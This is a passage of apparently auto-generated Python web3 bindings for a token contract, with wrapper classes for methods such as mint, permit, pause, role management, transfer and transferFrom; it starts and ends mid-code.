        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class IsTrustedForwarderMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the isTrustedForwarder method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, forwarder: str):
        """Validate the inputs to the isTrustedForwarder method."""
        self.validator.assert_valid(
            method_name='isTrustedForwarder', parameter_name='forwarder', argument_value=forwarder)
        return self.validate_and_checksum_address(forwarder)

    def call(self, forwarder: str, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(forwarder).call(params))

    def send_transaction(self, forwarder: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).transact(params)

    def build_transaction(self, forwarder: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).buildTransaction(params)

    def estimate_gas(self, forwarder: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).estimateGas(params)
class MintMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the mint method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, to: str, amount: int):
        """Validate the inputs to the mint method."""
        self.validator.assert_valid(
            method_name='mint', parameter_name='to', argument_value=to)
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name='mint', parameter_name='amount', argument_value=amount)
        # int() safeguards against fractional inputs
        amount = int(amount)
        return (to, amount)

    def call(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(to, amount).call(params)

    def send_transaction(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).transact(params)

    def build_transaction(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).buildTransaction(params)

    def estimate_gas(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).estimateGas(params)
class NameMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the name method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class NoncesMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the nonces method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, owner: str):
        """Validate the inputs to the nonces method."""
        self.validator.assert_valid(
            method_name='nonces', parameter_name='owner', argument_value=owner)
        return self.validate_and_checksum_address(owner)

    def call(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(owner).call(params))

    def send_transaction(self, owner: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).transact(params)

    def build_transaction(self, owner: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).buildTransaction(params)

    def estimate_gas(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).estimateGas(params)
class PauseMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the pause method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method().call(params)

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PausedMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the paused method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PermitMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the permit method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str]):
        """Validate the inputs to the permit method."""
        # NOTE: validation/normalization is interleaved parameter-by-parameter
        # (matching the original generated order) so failure ordering is stable.
        self.validator.assert_valid(
            method_name='permit', parameter_name='owner', argument_value=owner)
        owner = self.validate_and_checksum_address(owner)
        self.validator.assert_valid(
            method_name='permit', parameter_name='spender', argument_value=spender)
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name='permit', parameter_name='value', argument_value=value)
        # int() safeguards against fractional inputs
        value = int(value)
        self.validator.assert_valid(
            method_name='permit', parameter_name='deadline', argument_value=deadline)
        # int() safeguards against fractional inputs
        deadline = int(deadline)
        self.validator.assert_valid(
            method_name='permit', parameter_name='v', argument_value=v)
        self.validator.assert_valid(
            method_name='permit', parameter_name='r', argument_value=r)
        self.validator.assert_valid(
            method_name='permit', parameter_name='s', argument_value=s)
        return (owner, spender, value, deadline, v, r, s)

    def call(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        owner, spender, value, deadline, v, r, s = self.validate_and_normalize_inputs(
            owner, spender, value, deadline, v, r, s)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(owner, spender, value, deadline, v, r, s).call(params)

    def send_transaction(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        owner, spender, value, deadline, v, r, s = self.validate_and_normalize_inputs(
            owner, spender, value, deadline, v, r, s)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender, value, deadline, v, r, s).transact(params)

    def build_transaction(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        owner, spender, value, deadline, v, r, s = self.validate_and_normalize_inputs(
            owner, spender, value, deadline, v, r, s)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender, value, deadline, v, r, s).buildTransaction(params)

    def estimate_gas(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        owner, spender, value, deadline, v, r, s = self.validate_and_normalize_inputs(
            owner, spender, value, deadline, v, r, s)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender, value, deadline, v, r, s).estimateGas(params)
class RenounceRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the renounceRole method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
        """Validate the inputs to the renounceRole method."""
        self.validator.assert_valid(
            method_name='renounceRole', parameter_name='role', argument_value=role)
        self.validator.assert_valid(
            method_name='renounceRole', parameter_name='account', argument_value=account)
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(role, account).call(params)

    def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class RevokeRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the revokeRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
        """Validate the inputs to the revokeRole method."""
        self.validator.assert_valid(
            method_name='revokeRole',
            parameter_name='role',
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name='revokeRole',
            parameter_name='account',
            argument_value=account,
        )
        # Normalize the account address to its checksummed form.
        account = self.validate_and_checksum_address(account)
        return role, account

    def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        txp = super().normalize_tx_params(tx_params)
        self._underlying_method(role, account).call(txp.as_dict())

    def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        txp = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).transact(txp.as_dict())

    def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        txp = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).buildTransaction(txp.as_dict())

    def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        txp = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).estimateGas(txp.as_dict())
class SetContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setContractURI method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, uri: str):
        """Validate the inputs to the setContractURI method."""
        self.validator.assert_valid(
            method_name='setContractURI',
            parameter_name='_URI',
            argument_value=uri,
        )
        # Single value (not a tuple); callers assign it back directly.
        return uri

    def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        uri = self.validate_and_normalize_inputs(uri)
        normalized = super().normalize_tx_params(tx_params)
        self._underlying_method(uri).call(normalized.as_dict())

    def send_transaction(self, uri: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        uri = self.validate_and_normalize_inputs(uri)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).transact(normalized.as_dict())

    def build_transaction(self, uri: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        uri = self.validate_and_normalize_inputs(uri)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).buildTransaction(normalized.as_dict())

    def estimate_gas(self, uri: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        uri = self.validate_and_normalize_inputs(uri)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).estimateGas(normalized.as_dict())
class SetRestrictedTransferMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setRestrictedTransfer method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, restricted_transfer: bool):
        """Validate the inputs to the setRestrictedTransfer method."""
        self.validator.assert_valid(
            method_name='setRestrictedTransfer',
            parameter_name='_restrictedTransfer',
            argument_value=restricted_transfer,
        )
        # Single value (not a tuple); callers assign it back directly.
        return restricted_transfer

    def call(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> None:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        restricted_transfer = self.validate_and_normalize_inputs(restricted_transfer)
        normalized = super().normalize_tx_params(tx_params)
        self._underlying_method(restricted_transfer).call(normalized.as_dict())

    def send_transaction(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        restricted_transfer = self.validate_and_normalize_inputs(restricted_transfer)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(restricted_transfer)
        return bound.transact(normalized.as_dict())

    def build_transaction(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        restricted_transfer = self.validate_and_normalize_inputs(restricted_transfer)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(restricted_transfer)
        return bound.buildTransaction(normalized.as_dict())

    def estimate_gas(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        restricted_transfer = self.validate_and_normalize_inputs(restricted_transfer)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(restricted_transfer)
        return bound.estimateGas(normalized.as_dict())
class SupportsInterfaceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the supportsInterface method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, interface_id: Union[bytes, str]):
        """Validate the inputs to the supportsInterface method."""
        self.validator.assert_valid(
            method_name='supportsInterface',
            parameter_name='interfaceId',
            argument_value=interface_id,
        )
        # Single value (not a tuple); callers assign it back directly.
        return interface_id

    def call(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> bool:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        normalized = super().normalize_tx_params(tx_params)
        raw = self._underlying_method(interface_id).call(normalized.as_dict())
        # Coerce the raw eth_call result to a plain bool.
        return bool(raw)

    def send_transaction(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).transact(normalized.as_dict())

    def build_transaction(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        interface_id = self.validate_and_normalize_inputs(interface_id)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).buildTransaction(normalized.as_dict())

    def estimate_gas(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        interface_id = self.validate_and_normalize_inputs(interface_id)
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).estimateGas(normalized.as_dict())
class SymbolMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the symbol method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = super().normalize_tx_params(tx_params)
        raw = self._underlying_method().call(normalized.as_dict())
        # Coerce the raw eth_call result to a plain str.
        return str(raw)

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(normalized.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(normalized.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(normalized.as_dict())
class TotalSupplyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the totalSupply method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = super().normalize_tx_params(tx_params)
        raw = self._underlying_method().call(normalized.as_dict())
        # Coerce the raw eth_call result to a plain int.
        return int(raw)

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(normalized.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(normalized.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(normalized.as_dict())
class TransferMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the transfer method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, recipient: str, amount: int):
        """Validate the inputs to the transfer method."""
        self.validator.assert_valid(
            method_name='transfer',
            parameter_name='recipient',
            argument_value=recipient,
        )
        # Normalize the recipient address to its checksummed form.
        recipient = self.validate_and_checksum_address(recipient)
        self.validator.assert_valid(
            method_name='transfer',
            parameter_name='amount',
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return recipient, amount

    def call(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        recipient, amount = self.validate_and_normalize_inputs(recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        raw = self._underlying_method(recipient, amount).call(normalized.as_dict())
        # Coerce the raw eth_call result to a plain bool.
        return bool(raw)

    def send_transaction(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        recipient, amount = self.validate_and_normalize_inputs(recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(recipient, amount)
        return bound.transact(normalized.as_dict())

    def build_transaction(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        recipient, amount = self.validate_and_normalize_inputs(recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(recipient, amount)
        return bound.buildTransaction(normalized.as_dict())

    def estimate_gas(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        recipient, amount = self.validate_and_normalize_inputs(recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(recipient, amount)
        return bound.estimateGas(normalized.as_dict())
class TransferFromMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the transferFrom method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, sender: str, recipient: str, amount: int):
        """Validate the inputs to the transferFrom method."""
        self.validator.assert_valid(
            method_name='transferFrom',
            parameter_name='sender',
            argument_value=sender,
        )
        # Normalize the sender address to its checksummed form.
        sender = self.validate_and_checksum_address(sender)
        self.validator.assert_valid(
            method_name='transferFrom',
            parameter_name='recipient',
            argument_value=recipient,
        )
        # Normalize the recipient address to its checksummed form.
        recipient = self.validate_and_checksum_address(recipient)
        self.validator.assert_valid(
            method_name='transferFrom',
            parameter_name='amount',
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return sender, recipient, amount

    def call(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        sender, recipient, amount = self.validate_and_normalize_inputs(
            sender, recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        raw = self._underlying_method(
            sender, recipient, amount).call(normalized.as_dict())
        # Coerce the raw eth_call result to a plain bool.
        return bool(raw)

    def send_transaction(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        sender, recipient, amount = self.validate_and_normalize_inputs(
            sender, recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(sender, recipient, amount)
        return bound.transact(normalized.as_dict())

    def build_transaction(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        sender, recipient, amount = self.validate_and_normalize_inputs(
            sender, recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(sender, recipient, amount)
        return bound.buildTransaction(normalized.as_dict())

    def estimate_gas(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        sender, recipient, amount = self.validate_and_normalize_inputs(
            sender, recipient, amount)
        normalized = super().normalize_tx_params(tx_params)
        bound = self._underlying_method(sender, recipient, amount)
        return bound.estimateGas(normalized.as_dict())
class UnpauseMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the unpause method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> None:
